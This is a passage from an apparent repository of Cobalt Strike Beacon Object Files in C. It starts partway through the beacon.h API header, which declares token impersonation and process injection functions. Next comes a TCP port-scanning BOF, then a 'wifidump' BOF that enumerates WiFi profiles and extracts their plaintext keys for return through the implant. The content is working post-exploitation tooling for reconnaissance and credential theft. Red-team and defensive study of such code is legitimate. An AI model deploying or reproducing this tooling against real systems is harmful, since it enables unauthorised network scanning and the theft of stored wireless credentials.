BeaconOutput(int type, char * data, int len); 53 | DECLSPEC_IMPORT void BeaconPrintf(int type, char * fmt, ...); 54 | 55 | 56 | /* Token Functions */ 57 | DECLSPEC_IMPORT BOOL BeaconUseToken(HANDLE token); 58 | DECLSPEC_IMPORT void BeaconRevertToken(); 59 | DECLSPEC_IMPORT BOOL BeaconIsAdmin(); 60 | 61 | /* Spawn+Inject Functions */ 62 | DECLSPEC_IMPORT void BeaconGetSpawnTo(BOOL x86, char * buffer, int length); 63 | DECLSPEC_IMPORT void BeaconInjectProcess(HANDLE hProc, int pid, char * payload, int p_len, int p_offset, char * arg, int a_len); 64 | DECLSPEC_IMPORT void BeaconInjectTemporaryProcess(PROCESS_INFORMATION * pInfo, char * payload, int p_len, int p_offset, char * arg, int a_len); 65 | DECLSPEC_IMPORT BOOL BeaconSpawnTemporaryProcess(BOOL x86, BOOL ignoreToken, STARTUPINFO * si, PROCESS_INFORMATION * pInfo); 66 | DECLSPEC_IMPORT void BeaconCleanupProcess(PROCESS_INFORMATION * pInfo); 67 | 68 | /* Utility Functions */ 69 | DECLSPEC_IMPORT BOOL toWideChar(char * src, wchar_t * dst, int max); 70 | -------------------------------------------------------------------------------- /Network/PortScan/PortScan.c: -------------------------------------------------------------------------------- 1 | #ifndef WIN32_LEAN_AND_MEAN 2 | #define WIN32_LEAN_AND_MEAN 3 | #endif 4 | #include 5 | #include 6 | #include 7 | #include 8 | #include 9 | #include 10 | #include 11 | #include "beacon.h" 12 | 13 | 14 | DECLSPEC_IMPORT INT WINAPI Ws2_32$WSAGetLastError(); 15 | DECLSPEC_IMPORT INT WSAAPI Ws2_32$getaddrinfo(PCSTR,PCSTR, const ADDRINFOA*, PADDRINFOA*); 16 | DECLSPEC_IMPORT SOCKET WSAAPI Ws2_32$socket(INT,INT,INT); 17 | DECLSPEC_IMPORT INT WSAAPI Ws2_32$connect(SOCKET, const SOCKADDR*, INT); 18 | DECLSPEC_IMPORT INT WINAPI Ws2_32$closesocket(); 19 | DECLSPEC_IMPORT VOID WSAAPI Ws2_32$freeaddrinfo(PADDRINFOA); 20 | DECLSPEC_IMPORT INT KERNEL32$RtlZeroMemory(void *data, size_t size); 21 | DECLSPEC_IMPORT INT WSAAPI Ws2_32$WSACleanup(); 22 | DECLSPEC_IMPORT INT WSAAPI Ws2_32$WSAStartup(WORD,LPWSADATA); 23 | DECLSPEC_IMPORT INT WSAAPI Ws2_32$closesocket(IN SOCKET); 24 | 25 | 26 | 27 | void go(char * buff, int len) 28 | { 29 | datap parser; 30 | char * target; 31 | char * port; 32 | 33 | BeaconDataParse(&parser, buff, len); 34 | target = BeaconDataExtract(&parser, NULL); 35 | port = BeaconDataExtract(&parser, NULL); 36 | 37 | WSADATA wsaData; 38 | SOCKET ConnectSocket = INVALID_SOCKET; 39 | struct addrinfo *result = NULL, 40 | *ptr = NULL, 41 | hints; 42 | 43 | int iResult; 44 | 45 | // Initialize Winsock 46 | iResult = Ws2_32$WSAStartup(MAKEWORD(2,2), &wsaData); 47 | if (iResult != 0) { 48 | BeaconPrintf(CALLBACK_OUTPUT,"WSAStartup failed with error: %d\n", iResult); 49 | 50 | } 51 | 52 | KERNEL32$RtlZeroMemory( &hints, sizeof(hints) ); 53 | hints.ai_family = AF_UNSPEC; 54 | hints.ai_socktype = SOCK_STREAM; 55 | hints.ai_protocol = IPPROTO_TCP; 56 | // 57 | // Resolve the server address and port 58 | iResult = Ws2_32$getaddrinfo(target, port, &hints, &result); 59 | if ( iResult != 0 ) { 60 | BeaconPrintf(CALLBACK_OUTPUT,"getaddrinfo failed with error: %d\n", iResult); 61 | Ws2_32$WSACleanup(); 62 | 63 | } 64 | 65 | // Attempt to connect to an address until one succeeds 66 | for(ptr=result; ptr != NULL ;ptr=ptr->ai_next) { 67 | 68 | // Create a SOCKET for connecting to server 69 | ConnectSocket = Ws2_32$socket(ptr->ai_family, ptr->ai_socktype, 70 | ptr->ai_protocol); 71 | if (ConnectSocket == INVALID_SOCKET) { 72 | BeaconPrintf(CALLBACK_OUTPUT,"socket failed with error: %ld\n", Ws2_32$WSAGetLastError()); 73 | Ws2_32$WSACleanup(); 74 | 75 | } 76 | 77 | // Connect to server. 78 | iResult = Ws2_32$connect( ConnectSocket, ptr->ai_addr, (int)ptr->ai_addrlen); 79 | if (iResult == SOCKET_ERROR) { 80 | Ws2_32$closesocket(ConnectSocket); 81 | ConnectSocket = INVALID_SOCKET; 82 | continue; 83 | } 84 | break; 85 | } 86 | 87 | Ws2_32$freeaddrinfo(result); 88 | 89 | if (ConnectSocket == INVALID_SOCKET) { 90 | BeaconPrintf(CALLBACK_OUTPUT,"Port %s not open on %s\n", port, target); 91 | Ws2_32$WSACleanup(); 92 | 93 | }else { 94 | BeaconPrintf(CALLBACK_OUTPUT, "Port %s open on %s\n", port, target); 95 | } 96 | 97 | // cleanup 98 | Ws2_32$closesocket(ConnectSocket); 99 | Ws2_32$WSACleanup(); 100 | 101 | 102 | 103 | } -------------------------------------------------------------------------------- /Collection/WiFi/wifidump.c: -------------------------------------------------------------------------------- 1 | #ifndef UNICODE 2 | #define UNICODE 3 | #endif 4 | #include 5 | #include 6 | #include 7 | #include 8 | #include 9 | #include 10 | #include "beacon.h" 11 | #define WLAN_PROFILE_GET_PLAINTEXT_KEY 4 12 | #define WLAN_PROFILE_GROUP_POLICY 0x00000001 13 | #define WLAN_READ_ACCESS ( STANDARD_RIGHTS_READ | FILE_READ_DATA ) 14 | #define WLAN_EXECUTE_ACCESS ( WLAN_READ_ACCESS | STANDARD_RIGHTS_EXECUTE | FILE_EXECUTE ) 15 | #define WLAN_WRITE_ACCESS ( WLAN_READ_ACCESS | WLAN_EXECUTE_ACCESS | STANDARD_RIGHTS_WRITE | FILE_WRITE_DATA | DELETE | WRITE_DAC ) 16 | 17 | DECLSPEC_IMPORT DWORD WINAPI WLANAPI$WlanOpenHandle(DWORD,PVOID,PDWORD,PHANDLE); 18 | DECLSPEC_IMPORT DWORD WINAPI WLANAPI$WlanEnumInterfaces(HANDLE,PVOID,PWLAN_INTERFACE_INFO_LIST*); 19 | DECLSPEC_IMPORT INT WINAPI OLE32$StringFromGUID2(REFGUID, LPOLESTR, INT); 20 | DECLSPEC_IMPORT DWORD WINAPI WLANAPI$WlanGetProfile(HANDLE,const GUID*,LPCWSTR,PVOID,LPWSTR*,DWORD*,DWORD*); 21 | DECLSPEC_IMPORT VOID WINAPI WLANAPI$WlanFreeMemory(PVOID); 22 | DECLSPEC_IMPORT DWORD WINAPI WLANAPI$WlanGetProfileList(HANDLE, const GUID*, PVOID, PWLAN_PROFILE_INFO_LIST*); 23 | 24 | void wifidump(IN PCHAR Buffer, 25 | IN ULONG Length) 26 | { 27 | // Parse Beacon Arguments 28 | datap parser; 29 | wchar_t * pProfileName; 30 | BeaconDataParse(&parser, Buffer, Length); 31 | pProfileName = (wchar_t *)BeaconDataExtract(&parser, NULL); 32 | 33 | //Declare variables 34 | HANDLE hClient = NULL; 35 | DWORD dwMaxClient = 2; // 36 | DWORD dwCurVersion = 0; 37 | DWORD dwResult = 0; 38 | DWORD dwRetVal = 0; 39 | int iRet = 0; 40 | WCHAR GuidString[39] = {0}; 41 | unsigned int i; 42 | PWLAN_INTERFACE_INFO_LIST pIfList = NULL; 43 | PWLAN_INTERFACE_INFO pIfInfo = NULL; 44 | LPWSTR pProfileXml = NULL; 45 | DWORD dwFlags = 0; 46 | DWORD dwGrantedAccess = 0; 47 | 48 | //Open handle on wifi interface 49 | dwResult = WLANAPI$WlanOpenHandle(dwMaxClient, NULL, &dwCurVersion, &hClient); 50 | if (dwResult != ERROR_SUCCESS) { 51 | BeaconPrintf(CALLBACK_OUTPUT,"WlanOpenHandle failed with error: %u\n", dwResult); 52 | } 53 | dwResult = WLANAPI$WlanEnumInterfaces(hClient, NULL, &pIfList); 54 | if (dwResult != ERROR_SUCCESS) { 55 | BeaconPrintf(CALLBACK_OUTPUT,"WlanEnumInterfaces failed with error: %u\n", dwResult); 56 | } else { 57 | for (i = 0; i < (int) pIfList->dwNumberOfItems; i++) { 58 | pIfInfo = (WLAN_INTERFACE_INFO *) &pIfList->InterfaceInfo[i]; 59 | iRet = OLE32$StringFromGUID2(&pIfInfo->InterfaceGuid, (LPOLESTR) &GuidString, 60 | sizeof(GuidString)/sizeof(*GuidString)); 61 | dwFlags = WLAN_PROFILE_GET_PLAINTEXT_KEY; 62 | dwResult = WLANAPI$WlanGetProfile(hClient, 63 | &pIfInfo->InterfaceGuid, 64 | pProfileName, 65 | NULL, 66 | &pProfileXml, 67 | &dwFlags, 68 | &dwGrantedAccess); 69 | if (dwResult != ERROR_SUCCESS) { 70 | BeaconPrintf(CALLBACK_OUTPUT,"WlanGetProfile failed with error: %u\n", 71 | dwResult); 72 | } else { 73 | BeaconPrintf(CALLBACK_OUTPUT,"Profile XML string: %ws\n", pProfileXml); 74 | } 75 | } 76 | } 77 | if (pProfileXml != NULL) { 78 | WLANAPI$WlanFreeMemory(pProfileXml); 79 | pProfileXml = NULL; 80 | } 81 | if (pIfList != NULL) { 82 | WLANAPI$WlanFreeMemory(pIfList); 83 | pIfList = NULL; 84 | } 85 | } 86 | void wifienum(IN PCHAR Buffer, 87 | IN ULONG Length) 88 | { 89 | HANDLE hClient = NULL; 90 | DWORD dwMaxClient = 2; // 91 | DWORD dwCurVersion = 0; 92 | DWORD dwResult = 0; 93 | DWORD dwRetVal = 0; 94 | int iRet = 0; 95 | WCHAR GuidString[39] = {0}; 96 | unsigned int i, j; 97 | 98 | PWLAN_INTERFACE_INFO_LIST pIfList = NULL; 99 | PWLAN_INTERFACE_INFO pIfInfo = NULL; 100 | 101 | PWLAN_PROFILE_INFO_LIST pProfileList = NULL; 102 | PWLAN_PROFILE_INFO pProfile = NULL; 103 | 104 | dwResult = WLANAPI$WlanOpenHandle(dwMaxClient, NULL, &dwCurVersion, &hClient); 105 | if (dwResult != ERROR_SUCCESS) { 106 | BeaconPrintf(CALLBACK_OUTPUT, "WlanOpenHandle failed with error: %u\n", dwResult); 107 | } 108 | 109 | dwResult = WLANAPI$WlanEnumInterfaces(hClient, NULL, &pIfList); 110 | if (dwResult != ERROR_SUCCESS) { 111 | BeaconPrintf(CALLBACK_OUTPUT, "WlanEnumInterfaces failed with error: %u\n", dwResult); 112 | } else { 113 | 114 | for (i = 0; i < (int) pIfList->dwNumberOfItems; i++) { 115 | pIfInfo = (WLAN_INTERFACE_INFO *) &pIfList->InterfaceInfo[i]; 116 | dwResult = WLANAPI$WlanGetProfileList(hClient, 117 | &pIfInfo->InterfaceGuid, 118 | NULL, 119 | &pProfileList); 120 | if (dwResult != ERROR_SUCCESS) { 121 | BeaconPrintf(CALLBACK_OUTPUT, "WlanGetProfileList failed with error: %u\n", 122 | dwResult); 123 | dwRetVal = 1; 124 | } else { 125 | 126 | for (j = 0; j < pProfileList->dwNumberOfItems; j++) { 127 | pProfile = 128 | (WLAN_PROFILE_INFO *) & pProfileList->ProfileInfo[j]; 129 | BeaconPrintf(CALLBACK_OUTPUT, " Profile Name[%u]: %ws\n", j, pProfile->strProfileName); 130 | 131 | } 132 | } 133 | } 134 | } 135 | if (pProfileList != NULL) { 136 | WLANAPI$WlanFreeMemory(pProfileList); 137 | pProfileList = NULL; 138 | } 139 | 140 | if (pIfList != NULL) { 141 | WLANAPI$WlanFreeMemory(pIfList); 142 | pIfList = NULL; 143 | } 144 | } --------------------------------------------------------------------------------